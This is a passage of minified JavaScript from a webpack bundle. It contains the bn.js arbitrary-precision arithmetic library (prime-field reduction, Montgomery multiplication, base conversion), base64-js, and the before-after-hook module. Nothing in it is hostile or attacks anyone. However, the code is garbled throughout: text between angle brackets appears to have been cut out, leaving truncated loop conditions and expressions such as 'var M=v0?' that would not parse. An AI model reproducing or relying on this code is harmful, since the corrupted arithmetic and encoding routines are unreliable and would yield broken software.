Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9742:(Pe,we)=>{"use strict";we.byteLength=function U(A){var p=$(A),w=p[1];return 3*(p[0]+w)/4-w},we.toByteArray=function C(A){var p,K,D=$(A),w=D[0],x=D[1],S=new j(function E(A,p,D){return 3*(p+D)/4-D}(0,w,x)),O=0,B=x>0?w-4:w;for(K=0;K>16&255,S[O++]=p>>8&255,S[O++]=255&p;return 2===x&&(p=ie[A.charCodeAt(K)]<<2|ie[A.charCodeAt(K+1)]>>4,S[O++]=255&p),1===x&&(p=ie[A.charCodeAt(K)]<<10|ie[A.charCodeAt(K+1)]<<4|ie[A.charCodeAt(K+2)]>>2,S[O++]=p>>8&255,S[O++]=255&p),S},we.fromByteArray=function y(A){for(var p,D=A.length,w=D%3,x=[],S=16383,O=0,B=D-w;OB?B:O+S));return 1===w?x.push(de[(p=A[D-1])>>2]+de[p<<4&63]+"=="):2===w&&x.push(de[(p=(A[D-2]<<8)+A[D-1])>>10]+de[p>>4&63]+de[p<<2&63]+"="),x.join("")};for(var de=[],ie=[],j="undefined"!=typeof Uint8Array?Uint8Array:Array,Q="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ae=0,I=Q.length;ae0)throw new Error("Invalid string. Length must be a multiple of 4");var D=A.indexOf("=");return-1===D&&(D=p),[D,D===p?0:4-D%4]}function b(A){return de[A>>18&63]+de[A>>12&63]+de[A>>6&63]+de[63&A]}function _(A,p,D){for(var x=[],S=p;S{var ie=de(5309),j=de(9597),Q=de(7117),ae=Function.bind,I=ae.bind(ae);function $(_,y,A){var p=I(Q,null).apply(null,A?[y,A]:[y]);_.api={remove:p},_.remove=p,["before","error","after","wrap"].forEach(function(D){var w=A?[y,D,A]:[y,D];_[D]=_.api[D]=I(j,null).apply(null,w)})}function E(){var _={registry:{}},y=ie.bind(null,_);return $(y,_),y}var C=!1;function b(){return C||(console.warn('[before-after-hook]: "Hook()" repurposing warning, use "Hook.Collection()". Read more: https://git.io/upgrade-before-after-hook-to-1.4'),C=!0),E()}b.Singular=function U(){var y={registry:{}},A=ie.bind(null,y,"h");return $(A,y,"h"),A}.bind(),b.Collection=E.bind(),Pe.exports=b,Pe.exports.Hook=b,Pe.exports.Singular=b.Singular,Pe.exports.Collection=b.Collection},9597:Pe=>{Pe.exports=function we(de,ie,j,Q){var ae=Q;de.registry[j]||(de.registry[j]=[]),"before"===ie&&(Q=function(I,$){return Promise.resolve().then(ae.bind(null,$)).then(I.bind(null,$))}),"after"===ie&&(Q=function(I,$){var U;return Promise.resolve().then(I.bind(null,$)).then(function(E){return ae(U=E,$)}).then(function(){return U})}),"error"===ie&&(Q=function(I,$){return Promise.resolve().then(I.bind(null,$)).catch(function(U){return ae(U,$)})}),de.registry[j].push({hook:Q,orig:ae})}},5309:Pe=>{Pe.exports=function we(de,ie,j,Q){if("function"!=typeof j)throw new Error("method for before hook must be a function");return Q||(Q={}),Array.isArray(ie)?ie.reverse().reduce(function(ae,I){return we.bind(null,de,I,ae,Q)},j)():Promise.resolve().then(function(){return de.registry[ie]?de.registry[ie].reduce(function(ae,I){return I.hook.bind(null,ae,Q)},j)():j(Q)})}},7117:Pe=>{Pe.exports=function we(de,ie,j){if(de.registry[ie]){var Q=de.registry[ie].map(function(ae){return ae.orig}).indexOf(j);-1!==Q&&de.registry[ie].splice(Q,1)}}},9423:function(Pe,we,de){!function(ie,j){"use strict";function Q(v,M){if(!v)throw new Error(M||"Assertion failed")}function ae(v,M){v.super_=M;var P=function(){};P.prototype=M.prototype,v.prototype=new P,v.prototype.constructor=v}function I(v,M,P){if(I.isBN(v))return v;this.negative=0,this.words=null,this.length=0,this.red=null,null!==v&&(("le"===M||"be"===M)&&(P=M,M=10),this._init(v||0,M||10,P||"be"))}var $;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{$="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(6601).Buffer}catch(v){}function U(v,M){var P=v.charCodeAt(M);return P>=48&&P<=57?P-48:P>=65&&P<=70?P-55:P>=97&&P<=102?P-87:void Q(!1,"Invalid character in "+v)}function E(v,M,P){var G=U(v,P);return P-1>=M&&(G|=U(v,P-1)<<4),G}function C(v,M,P,G){for(var X=0,L=0,h=Math.min(v.length,P),R=M;R=49?J-49+10:J>=17?J-17+10:J,Q(J>=0&&L0?M:P},I.min=function(M,P){return M.cmp(P)<0?M:P},I.prototype._init=function(M,P,G){if("number"==typeof M)return this._initNumber(M,P,G);if("object"==typeof M)return this._initArray(M,P,G);"hex"===P&&(P=16),Q(P===(0|P)&&P>=2&&P<=36);var X=0;"-"===(M=M.toString().replace(/\s+/g,""))[0]&&(X++,this.negative=1),X=0;X-=3)this.words[L]|=(h=M[X]|M[X-1]<<8|M[X-2]<<16)<>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);else if("le"===G)for(X=0,L=0;X>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);return this._strip()},I.prototype._parseHex=function(M,P,G){this.length=Math.ceil((M.length-P)/6),this.words=new Array(this.length);for(var X=0;X=P;X-=2)R=E(M,P,X)<=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;else for(X=(M.length-P)%2==0?P+1:P;X=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;this._strip()},I.prototype._parseBase=function(M,P,G){this.words=[0],this.length=1;for(var X=0,L=1;L<=67108863;L*=P)X++;X--,L=L/P|0;for(var h=M.length-G,R=h%X,J=Math.min(h,h-R)+G,Z=0,ue=G;ue1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},"undefined"!=typeof Symbol&&"function"==typeof Symbol.for)try{I.prototype[Symbol.for("nodejs.util.inspect.custom")]=_}catch(v){I.prototype.inspect=_}else I.prototype.inspect=_;function _(){return(this.red?""}var y=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],A=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],p=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function x(v,M,P){P.negative=M.negative^v.negative;var G=v.length+M.length|0;P.length=G,G=G-1|0;var X=0|v.words[0],L=0|M.words[0],h=X*L,J=h/67108864|0;P.words[0]=67108863&h;for(var Z=1;Z>>26,Ie=67108863&J,Ae=Math.min(Z,M.length-1),Ue=Math.max(0,Z-v.length+1);Ue<=Ae;Ue++)ue+=(h=(X=0|v.words[Z-Ue|0])*(L=0|M.words[Ue])+Ie)/67108864|0,Ie=67108863&h;P.words[Z]=0|Ie,J=0|ue}return 0!==J?P.words[Z]=0|J:P.length--,P._strip()}I.prototype.toString=function(M,P){var G;if(P=0|P||1,16===(M=M||10)||"hex"===M){G="";for(var X=0,L=0,h=0;h>>24-X&16777215,(X+=2)>=26&&(X-=26,h--),G=0!==L||h!==this.length-1?y[6-J.length]+J+G:J+G}for(0!==L&&(G=L.toString(16)+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}if(M===(0|M)&&M>=2&&M<=36){var Z=A[M],ue=p[M];G="";var Ie=this.clone();for(Ie.negative=0;!Ie.isZero();){var Ae=Ie.modrn(ue).toString(M);G=(Ie=Ie.idivn(ue)).isZero()?Ae+G:y[Z-Ae.length]+Ae+G}for(this.isZero()&&(G="0"+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var M=this.words[0];return 2===this.length?M+=67108864*this.words[1]:3===this.length&&1===this.words[2]?M+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-M:M},I.prototype.toJSON=function(){return this.toString(16,2)},$&&(I.prototype.toBuffer=function(M,P){return this.toArrayLike($,M,P)}),I.prototype.toArray=function(M,P){return this.toArrayLike(Array,M,P)},I.prototype.toArrayLike=function(M,P,G){this._strip();var X=this.byteLength(),L=G||Math.max(1,X);Q(X<=L,"byte array longer than desired length"),Q(L>0,"Requested array length <= 0");var h=function(M,P){return M.allocUnsafe?M.allocUnsafe(P):new M(P)}(M,L);return this["_toArrayLike"+("le"===P?"LE":"BE")](h,X),h},I.prototype._toArrayLikeLE=function(M,P){for(var G=0,X=0,L=0,h=0;L>8&255),G>16&255),6===h?(G>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G=0&&(M[G--]=R>>8&255),G>=0&&(M[G--]=R>>16&255),6===h?(G>=0&&(M[G--]=R>>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G>=0)for(M[G--]=X;G>=0;)M[G--]=0},I.prototype._countBits=Math.clz32?function(M){return 32-Math.clz32(M)}:function(M){var P=M,G=0;return P>=4096&&(G+=13,P>>>=13),P>=64&&(G+=7,P>>>=7),P>=8&&(G+=4,P>>>=4),P>=2&&(G+=2,P>>>=2),G+P},I.prototype._zeroBits=function(M){if(0===M)return 26;var P=M,G=0;return 0==(8191&P)&&(G+=13,P>>>=13),0==(127&P)&&(G+=7,P>>>=7),0==(15&P)&&(G+=4,P>>>=4),0==(3&P)&&(G+=2,P>>>=2),0==(1&P)&&G++,G},I.prototype.bitLength=function(){var P=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+P},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var M=0,P=0;PM.length?this.clone().ior(M):M.clone().ior(this)},I.prototype.uor=function(M){return this.length>M.length?this.clone().iuor(M):M.clone().iuor(this)},I.prototype.iuand=function(M){var P;P=this.length>M.length?M:this;for(var G=0;GM.length?this.clone().iand(M):M.clone().iand(this)},I.prototype.uand=function(M){return this.length>M.length?this.clone().iuand(M):M.clone().iuand(this)},I.prototype.iuxor=function(M){var P,G;this.length>M.length?(P=this,G=M):(P=M,G=this);for(var X=0;XM.length?this.clone().ixor(M):M.clone().ixor(this)},I.prototype.uxor=function(M){return this.length>M.length?this.clone().iuxor(M):M.clone().iuxor(this)},I.prototype.inotn=function(M){Q("number"==typeof M&&M>=0);var P=0|Math.ceil(M/26),G=M%26;this._expand(P),G>0&&P--;for(var X=0;X0&&(this.words[X]=~this.words[X]&67108863>>26-G),this._strip()},I.prototype.notn=function(M){return this.clone().inotn(M)},I.prototype.setn=function(M,P){Q("number"==typeof M&&M>=0);var G=M/26|0,X=M%26;return this._expand(G+1),this.words[G]=P?this.words[G]|1<M.length?(G=this,X=M):(G=M,X=this);for(var L=0,h=0;h>>26;for(;0!==L&&h>>26;if(this.length=G.length,0!==L)this.words[this.length]=L,this.length++;else if(G!==this)for(;hM.length?this.clone().iadd(M):M.clone().iadd(this)},I.prototype.isub=function(M){if(0!==M.negative){M.negative=0;var P=this.iadd(M);return M.negative=1,P._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(M),this.negative=1,this._normSign();var X,L,G=this.cmp(M);if(0===G)return this.negative=0,this.length=1,this.words[0]=0,this;G>0?(X=this,L=M):(X=M,L=this);for(var h=0,R=0;R>26,this.words[R]=67108863&P;for(;0!==h&&R>26,this.words[R]=67108863&P;if(0===h&&R>>13,Xe=0|X[1],He=8191&Xe,Be=Xe>>>13,qe=0|X[2],De=8191&qe,Ve=qe>>>13,ze=0|X[3],me=8191&ze,Ke=ze>>>13,rt=0|X[4],Ge=8191&rt,Qe=rt>>>13,ht=0|X[5],mt=8191&ht,lt=ht>>>13,ft=0|X[6],xe=8191&ft,We=ft>>>13,Je=0|X[7],Oe=8191&Je,Te=Je>>>13,Le=0|X[8],$e=8191&Le,st=Le>>>13,xt=0|X[9],pt=8191&xt,vt=xt>>>13,Wi=0|L[0],Ft=8191&Wi,zt=Wi>>>13,pa=0|L[1],Jt=8191&pa,Gt=pa>>>13,Co=0|L[2],jt=8191&Co,qt=Co>>>13,Qn=0|L[3],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|L[4],ti=8191&Bo,ii=Bo>>>13,pn=0|L[5],Pt=8191&pn,Xt=pn>>>13,Ho=0|L[6],Qt=8191&Ho,ei=Ho>>>13,$o=0|L[7],ai=8191&$o,$t=$o>>>13,zo=0|L[8],Ut=8191&zo,Yt=zo>>>13,ha=0|L[9],Ha=8191&ha,Va=ha>>>13;G.negative=M.negative^P.negative,G.length=19;var co=(R+(J=Math.imul(Ae,Ft))|0)+((8191&(Z=(Z=Math.imul(Ae,zt))+Math.imul(Ue,Ft)|0))<<13)|0;R=((ue=Math.imul(Ue,zt))+(Z>>>13)|0)+(co>>>26)|0,co&=67108863,J=Math.imul(He,Ft),Z=(Z=Math.imul(He,zt))+Math.imul(Be,Ft)|0,ue=Math.imul(Be,zt);var io=(R+(J=J+Math.imul(Ae,Jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Gt)|0)+(Z>>>13)|0)+(io>>>26)|0,io&=67108863,J=Math.imul(De,Ft),Z=(Z=Math.imul(De,zt))+Math.imul(Ve,Ft)|0,ue=Math.imul(Ve,zt),J=J+Math.imul(He,Jt)|0,Z=(Z=Z+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,ue=ue+Math.imul(Be,Gt)|0;var yo=(R+(J=J+Math.imul(Ae,jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,qt)|0)+(Z>>>13)|0)+(yo>>>26)|0,yo&=67108863,J=Math.imul(me,Ft),Z=(Z=Math.imul(me,zt))+Math.imul(Ke,Ft)|0,ue=Math.imul(Ke,zt),J=J+Math.imul(De,Jt)|0,Z=(Z=Z+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,ue=ue+Math.imul(Ve,Gt)|0,J=J+Math.imul(He,jt)|0,Z=(Z=Z+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,ue=ue+Math.imul(Be,qt)|0;var Vn=(R+(J=J+Math.imul(Ae,Kt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Zt)|0)+(Z>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,J=Math.imul(Ge,Ft),Z=(Z=Math.imul(Ge,zt))+Math.imul(Qe,Ft)|0,ue=Math.imul(Qe,zt),J=J+Math.imul(me,Jt)|0,Z=(Z=Z+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,ue=ue+Math.imul(Ke,Gt)|0,J=J+Math.imul(De,jt)|0,Z=(Z=Z+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,ue=ue+Math.imul(Ve,qt)|0,J=J+Math.imul(He,Kt)|0,Z=(Z=Z+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,ue=ue+Math.imul(Be,Zt)|0;var Eo=(R+(J=J+Math.imul(Ae,ti)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ii)|0)+(Z>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,J=Math.imul(mt,Ft),Z=(Z=Math.imul(mt,zt))+Math.imul(lt,Ft)|0,ue=Math.imul(lt,zt),J=J+Math.imul(Ge,Jt)|0,Z=(Z=Z+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,ue=ue+Math.imul(Qe,Gt)|0,J=J+Math.imul(me,jt)|0,Z=(Z=Z+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,ue=ue+Math.imul(Ke,qt)|0,J=J+Math.imul(De,Kt)|0,Z=(Z=Z+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,ue=ue+Math.imul(Ve,Zt)|0,J=J+Math.imul(He,ti)|0,Z=(Z=Z+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,ue=ue+Math.imul(Be,ii)|0;var Pn=(R+(J=J+Math.imul(Ae,Pt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Xt)|0)+(Z>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,J=Math.imul(xe,Ft),Z=(Z=Math.imul(xe,zt))+Math.imul(We,Ft)|0,ue=Math.imul(We,zt),J=J+Math.imul(mt,Jt)|0,Z=(Z=Z+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,ue=ue+Math.imul(lt,Gt)|0,J=J+Math.imul(Ge,jt)|0,Z=(Z=Z+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,ue=ue+Math.imul(Qe,qt)|0,J=J+Math.imul(me,Kt)|0,Z=(Z=Z+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,ue=ue+Math.imul(Ke,Zt)|0,J=J+Math.imul(De,ti)|0,Z=(Z=Z+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,ue=ue+Math.imul(Ve,ii)|0,J=J+Math.imul(He,Pt)|0,Z=(Z=Z+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,ue=ue+Math.imul(Be,Xt)|0;var lo=(R+(J=J+Math.imul(Ae,Qt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ei)|0)+(Z>>>13)|0)+(lo>>>26)|0,lo&=67108863,J=Math.imul(Oe,Ft),Z=(Z=Math.imul(Oe,zt))+Math.imul(Te,Ft)|0,ue=Math.imul(Te,zt),J=J+Math.imul(xe,Jt)|0,Z=(Z=Z+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,ue=ue+Math.imul(We,Gt)|0,J=J+Math.imul(mt,jt)|0,Z=(Z=Z+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,ue=ue+Math.imul(lt,qt)|0,J=J+Math.imul(Ge,Kt)|0,Z=(Z=Z+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,ue=ue+Math.imul(Qe,Zt)|0,J=J+Math.imul(me,ti)|0,Z=(Z=Z+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,ue=ue+Math.imul(Ke,ii)|0,J=J+Math.imul(De,Pt)|0,Z=(Z=Z+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,ue=ue+Math.imul(Ve,Xt)|0,J=J+Math.imul(He,Qt)|0,Z=(Z=Z+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,ue=ue+Math.imul(Be,ei)|0;var ao=(R+(J=J+Math.imul(Ae,ai)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,$t)|0)+(Z>>>13)|0)+(ao>>>26)|0,ao&=67108863,J=Math.imul($e,Ft),Z=(Z=Math.imul($e,zt))+Math.imul(st,Ft)|0,ue=Math.imul(st,zt),J=J+Math.imul(Oe,Jt)|0,Z=(Z=Z+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,ue=ue+Math.imul(Te,Gt)|0,J=J+Math.imul(xe,jt)|0,Z=(Z=Z+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,ue=ue+Math.imul(We,qt)|0,J=J+Math.imul(mt,Kt)|0,Z=(Z=Z+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,ue=ue+Math.imul(lt,Zt)|0,J=J+Math.imul(Ge,ti)|0,Z=(Z=Z+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,ue=ue+Math.imul(Qe,ii)|0,J=J+Math.imul(me,Pt)|0,Z=(Z=Z+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,ue=ue+Math.imul(Ke,Xt)|0,J=J+Math.imul(De,Qt)|0,Z=(Z=Z+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,ue=ue+Math.imul(Ve,ei)|0,J=J+Math.imul(He,ai)|0,Z=(Z=Z+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,ue=ue+Math.imul(Be,$t)|0;var bo=(R+(J=J+Math.imul(Ae,Ut)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Yt)|0)+(Z>>>13)|0)+(bo>>>26)|0,bo&=67108863,J=Math.imul(pt,Ft),Z=(Z=Math.imul(pt,zt))+Math.imul(vt,Ft)|0,ue=Math.imul(vt,zt),J=J+Math.imul($e,Jt)|0,Z=(Z=Z+Math.imul($e,Gt)|0)+Math.imul(st,Jt)|0,ue=ue+Math.imul(st,Gt)|0,J=J+Math.imul(Oe,jt)|0,Z=(Z=Z+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,ue=ue+Math.imul(Te,qt)|0,J=J+Math.imul(xe,Kt)|0,Z=(Z=Z+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,ue=ue+Math.imul(We,Zt)|0,J=J+Math.imul(mt,ti)|0,Z=(Z=Z+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,ue=ue+Math.imul(lt,ii)|0,J=J+Math.imul(Ge,Pt)|0,Z=(Z=Z+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,ue=ue+Math.imul(Qe,Xt)|0,J=J+Math.imul(me,Qt)|0,Z=(Z=Z+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,ue=ue+Math.imul(Ke,ei)|0,J=J+Math.imul(De,ai)|0,Z=(Z=Z+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,ue=ue+Math.imul(Ve,$t)|0,J=J+Math.imul(He,Ut)|0,Z=(Z=Z+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0,ue=ue+Math.imul(Be,Yt)|0;var $n=(R+(J=J+Math.imul(Ae,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Va)|0)+Math.imul(Ue,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Va)|0)+(Z>>>13)|0)+($n>>>26)|0,$n&=67108863,J=Math.imul(pt,Jt),Z=(Z=Math.imul(pt,Gt))+Math.imul(vt,Jt)|0,ue=Math.imul(vt,Gt),J=J+Math.imul($e,jt)|0,Z=(Z=Z+Math.imul($e,qt)|0)+Math.imul(st,jt)|0,ue=ue+Math.imul(st,qt)|0,J=J+Math.imul(Oe,Kt)|0,Z=(Z=Z+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,ue=ue+Math.imul(Te,Zt)|0,J=J+Math.imul(xe,ti)|0,Z=(Z=Z+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,ue=ue+Math.imul(We,ii)|0,J=J+Math.imul(mt,Pt)|0,Z=(Z=Z+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,ue=ue+Math.imul(lt,Xt)|0,J=J+Math.imul(Ge,Qt)|0,Z=(Z=Z+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,ue=ue+Math.imul(Qe,ei)|0,J=J+Math.imul(me,ai)|0,Z=(Z=Z+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,ue=ue+Math.imul(Ke,$t)|0,J=J+Math.imul(De,Ut)|0,Z=(Z=Z+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0,ue=ue+Math.imul(Ve,Yt)|0;var 